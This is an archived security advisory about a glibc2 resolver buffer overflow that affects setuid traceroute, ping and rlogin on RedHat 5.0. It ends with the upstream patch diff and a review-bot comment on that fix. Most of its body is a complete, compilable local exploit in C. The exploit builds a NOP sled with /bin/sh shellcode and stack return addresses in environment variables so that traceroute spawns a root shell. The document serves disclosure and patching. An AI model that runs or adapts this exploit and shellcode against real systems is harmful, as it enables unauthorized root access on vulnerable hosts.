COMMAND

    /bin/ping,  /usr/sbin/traceroute,  /usr/bin/rlogin,   /usr/bin/rsh
    (actually glibc2 is the guilty one)

SYSTEMS AFFECTED

    RedHat 5.0 (Linux)

PROBLEM

    Wilton Wong found the following setuid programs and noticed that in
    RedHat 5.0 you can overrun buffers in a few of them.  Below is an
    exploit for traceroute; nothing fancy, just what was used to test it
    with a simple eggshell.

    /*

       Just Your Standard EGGSHELL Proggie:
       traceroute buffer overflow exploit for RedHat Linux 5.0
       mostly ripped from Aleph One <aleph1@underground.org>

       Wilton Wong
       wwong@blackstar.net

       gcc -o trace_shell trace_shell.c

    */
    #include <stdlib.h>

    /* Built-in defaults; main() lets argv[1], argv[2] and argv[3] override
       bsize, offset and eggsize respectively.  NOP is the single-byte
       i386 no-op opcode that main() uses as padding in front of the
       payload. */
    #define DEFAULT_OFFSET                 0
    #define DEFAULT_BUFFER_SIZE            1019
    #define DEFAULT_EGG_SIZE               2048
    #define NOP                            0x90

    /* Raw i386 Linux machine-code payload, ending in the string "/bin/sh";
       main() copies it byte-for-byte behind the NOP padding.  Per the
       header comment it is taken from Aleph One's published eggshell. */
    char shellcode[] =
            "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
            "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
            "\x80\xe8\xdc\xff\xff\xff/bin/sh";

    /* Reads the current stack pointer.  The inline asm moves %esp into
       %eax and the function then falls off its end with no return
       statement, relying on %eax being the i386 return register.  In
       standard C that is undefined behaviour (control reaches the end of
       a non-void function and the value is used), and the code is x86-only
       by construction; an optimising compiler may not preserve it. */
    unsigned long get_sp(void) {
       __asm__("movl %esp,%eax");
    }

    /* Entry point of the test harness described in the advisory.
       Builds two heap buffers -- `buff`, filled with repeated copies of a
       stack address, and `egg`, NOP padding followed by `shellcode` --
       exports them as the environment variables RET and EGG, then spawns
       /bin/bash so the user can run traceroute with $RET as argument.
       Portability notes: `void main` is non-standard (C requires `int`),
       and printf/strlen/memcpy are used without <stdio.h>/<string.h>, so
       they are implicitly declared -- rejected by C99 and later compilers.
       Both malloc failures exit with status 0, i.e. report success. */
    void main(int argc, char *argv[]) {
      char *buff, *ptr, *egg;
      long *addr_ptr, addr;
      int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE;
      int i, eggsize=DEFAULT_EGG_SIZE;

      /* Optional overrides: buffer size, stack offset, egg size.  atoi()
         reports no errors, so non-numeric or negative input is accepted. */
      if (argc > 1) bsize  = atoi(argv[1]);
      if (argc > 2) offset = atoi(argv[2]);
      if (argc > 3) eggsize = atoi(argv[3]);

      if (!(buff = malloc(bsize))) {
        printf("Can't allocate memory.\n");
        exit(0);
      }
      if (!(egg = malloc(eggsize))) {
        printf("Can't allocate memory.\n");
        exit(0);
      }

      /* Candidate address derived from this process's own stack pointer;
         only meaningful if the target's stack layout matches, which is
         why `offset` is tunable. */
      addr = get_sp() - offset;
      printf("Using address: 0x%x\n", addr);

      /* Fill buff with addr in 4-byte (sizeof long on i386) strides. */
      ptr = buff;
      addr_ptr = (long *) ptr;
      for (i = 0; i < bsize; i+=4)
        *(addr_ptr++) = addr;

      /* egg = NOP padding, then the payload bytes.  Note the int `i` is
         compared against a size_t expression here (signed/unsigned
         promotion). */
      ptr = egg;
      for (i = 0; i < eggsize - strlen(shellcode) - 1; i++)
        *(ptr++) = NOP;

      for (i = 0; i < strlen(shellcode); i++)
        *(ptr++) = shellcode[i];

      /* NUL-terminate both so they are valid C strings for putenv(). */
      buff[bsize - 1] = '\0';
      egg[eggsize - 1] = '\0';

      /* Overwrite the first four bytes of each buffer with the variable
         name prefix; putenv() keeps the pointer, so the buffers are
         intentionally never freed. */
      memcpy(egg,"EGG=",4);
      putenv(egg);
      memcpy(buff,"RET=",4);
      putenv(buff);
      printf("Now run: /usr/sbin/traceroute $RET\n");
      system("/bin/bash");
    }

SOLUTION

    The problem lies deep within one of the libraries.. glibc2  joy...
    the programs themselves are not vulnerable.  The newer traceroute is:

        Intel: Upgrade to traceroute-1.4a5-5.i386.rpm
        Alpha: Upgrade to traceroute-1.4a5-5.alpha.rpm

    The patch will be in glibc 2.0.6, which should be released soonish.
    The patch has been in the development version of glibc 2.1 for some
    time already but didn't make it into the 2.0 track.  Patch:

    $ diff -u /dbase/glibc-2.0.6pre4/resolv/res_query.c /usr/glibc/src/libc/resolv/
    --- /dbase/glibc-2.0.6pre4/resolv/res_query.c   Mon Jan  6 23:05:43 1997
    +++ /usr/glibc/src/libc/resolv/res_query.c      Mon Dec  8 09:05:53 1997
    @@ -321,7 +321,7 @@
            u_char *answer;         /* buffer to put answer */
            int anslen;             /* size of answer */
     {
    -       char nbuf[MAXDNAME];
    +       char nbuf[MAXDNAME * 2 + 2];
            const char *longname = nbuf;
            int n;
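Review bot: Enlarging `nbuf` to `MAXDNAME * 2 + 2` fixes the overflow only under the assumption that each string later written into it is itself bounded by MAXDNAME; the code that fills `nbuf` is outside this hunk, so that bound cannot be checked here. If the fill is an unbounded formatting or copy call, a size-bounded variant using `sizeof nbuf` together with an explicit length check on the inputs would make the fix independent of that assumption. The new size also deserves a comment stating what it accounts for, presumably two MAXDNAME components plus a separator and the terminating NUL, e.g. `/* room for name + '.' + domain + '\0', each at most MAXDNAME */`. The enclosing function's signature begins before this hunk and its body continues after it.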

    RedHat will be releasing an updated 2.0.5c RPM.